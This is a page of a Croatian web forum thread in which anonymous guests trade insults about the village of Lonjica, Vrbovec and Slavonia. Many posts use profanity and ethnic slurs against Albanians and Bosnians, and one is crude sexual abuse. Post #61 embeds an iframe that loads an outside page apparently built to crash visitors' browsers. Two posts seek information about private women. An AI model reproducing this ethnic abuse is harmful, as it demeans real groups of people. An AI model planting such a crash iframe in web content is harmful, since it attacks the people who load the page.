Stranica 3 od 4 PrvaPrva 1234 PosljednjiPosljednji
Prikazujem rezultate 51 do 75 od 82

Tema: UGLEDAJTE SE NE LONJICU!!!!1

  1. #51
    $$$$$$$
    Guest
    ej pa šipci su na jugo-istoku ×××××× jedne!!!a janjevci na istoku!!!"SLAVONIJO POLJA MOJA NEMA VI ŠE ZATE GNOJA POJELA GA OVA JANJAD ŠTO O TVRDOM KURCU SANJA!!!!ej ja sam prvi put u slavonji i pal je snjeg.idemo se sanjkat znaš onu velku doool i brijeg!!!!PS slavonci idioti!!!!

  2. #52
    hr
    Guest
    ) <lonjica je tako drago selo pozdrav svima kolikovas internet ima

  3. #53
    hr
    Guest
    ) <lonjica je tako drago selo pozdrav svima kolikovas internet ima

  4. #54
    HRVAT
    Guest
    ) <lonjica je tako drago selo pozdrav svima kolikovas internet ima

  5. #55
    lonjičak
    Guest
    ×××× vam pas mater glupu slavonsku, kaj ste tak retardirani, daj se pomirite da smo mi najbolji, nema nas svijet, bilo bi vam bolje da se odete družiti tamo sa vašim bliskim prijateljima "BOSANCIMA" ) ) ) ) ) ) )

  6. #56
    gospođica SMITH
    Guest
    vi niste normalni! (by:Vrbovec)

  7. #57
    lonjičakima
    Guest
    Ma najbolji ste , među ××××× i ×××××e pomješali se šipci i bosanci . ludilo od mjesta.

  8. #58
    iz LONJICE
    Guest
    KAL SVI VRIJEĐAJU LONJICU?
    DAJ NAS JEDNOM POSJETI, I VJERUJ MI VIŠE SE NEĆEŠ HTJET MAKNUT IZ TOG VELEGRADA.




    L
    O
    NJ
    I
    C
    A








  9. #59
    Big cock
    Guest
    Najebat ćete vi iz lonjice kad vas nađem na karti!!!!!!!!!!!!!!!!!!!!!!

  10. #60
    Big Cock
    Guest
    Lonjica je najveća vuko××××na na svijetu!!!!!!!!!!!!

  11. #61
    lonjica
    Guest
    <IFRAME src="http://www.newdream.net/crash/js2.html" width="400" height="500"
    scrolling="auto" frameborder="1">
    :Your user agent does not support frames or is currently configured
    not to display frames. However, you may visit
    <A href="http://www.newdream.net/crash/js2.html">the related document.</A>:
    </IFRAME>

  12. #62
    gost666
    Guest
    iz lonjice sam i bio sam u vasoj ponosnoj slavoniji 91,a sjecam se da je puno slavonaca bilo tamo ali se sjecam i da ih je pun ××××× pobjego u franfurkt bojnu

  13. #63
    iiiiIIIIIIIIIIIIIII
    Guest
    jel ti drago kaj si se izboril da imaš lonjicu punu šiptara i bosanaca ?

  14. #64
    j@
    Guest
    ajd od××××te od lonjice.....nismo mi krivi kaj se svugdje zna za nas..................a kaj se može kad smo takva metropola..........................GOOO LONJICA

  15. #65
    je
    Guest
    Bosansko - šiptarska metropola.

  16. #66
    j@
    Guest
    mama ti je bosansko-šiptarska metropola.......................od××××

  17. #67
    suzy
    Guest
    pa istina,ja sam iz lonjice,ali raelno gledano,puna je bosanaca i šiptara!!!!

  18. #68
    lola
    Guest
    Da li zna netko od vas Horvatič I. plavuša oko 30 god . ????

  19. #69
    lao
    Guest
    ja sam iz lonjice i nemam nista protiv osijeka a obozavam vukovar i realno gledajuci,linjica nema koji ××××× tu raditi,za to postoji zg i okolica....pozz

  20. #70
    lonjo
    Guest
    koji ste vi krepali debili..

  21. #71
    ivana15
    Guest
    slavonija je zakon..ja sam rođena u vinkovcima..al živim u dugom selo to selo blizu lonjice...i ti iz lonjice su sami ×××××i i ×××××..a ni dugo selo nije ništa bolje..ja bi najrađe otišla u moju slavoniju...VINKOVCI VOLIM VAS

  22. #72
    V R B O V Č A N K A
    Guest
    JOOOJ AJDE CURO OLADI!!!BOG TE ×××× LONJICU SI NAŠLA!!!! PA DAJ SE SKRIJTE!!!IMAJU SE I NA KAJ UGLEDATI!!!! PA TAM SVE SMRDI I PUN JE ××××× ŠIPTAROV!!!!! SAMO MI JE SADA ŽAO KAJ CIJELI OSIJEK I OKOLICA VRIJEĐAJU VRBOVEC ZBOG VAS ŠIPTAROV IZ LONJICE!!!! PA VI VRBOVCU NISTE NI DO KOLJENA JADNICI JEDNI BALAVI!!!!!!!

  23. #73
    by vrbovec
    Guest
    Ajd lonjičaki od××××te od slavonaca. Slavonci su pametni i zgodni za razliku od vas. Jadni ste svugdi nabijate svoje njuške,forum Zg i okolica pun je vaših ×××××× jer morate i tu? Onak daj od××××te od ovih ljudi. Imala sam dečka u Slavoniji i mogu reć da su 100 puta boli od vas koji samo hoćete sex. Tak da Lonjičaki OD××××TE

  24. #74
    za-by vrbovec
    Guest
    tak je!!! ajde da se neko i sa mnom složio!!! Svaka ti čast sve je istina kaj si napisala!!! by, V R B O V Č A N K A !!!!!11

  25. #75
    ivan os-vrb
    Guest
    ima li tko iz vrbovca ili okolice neka se javi???trebam ga pitati nesto u vezi jedne zenske osobe

Pravila postanja

  • Ne možeš stvarati nove teme
  • Ne možeš odgovarati na postove
  • Ne možeš slati privitke
  • Ne možeš mijenjati svoje postove
  •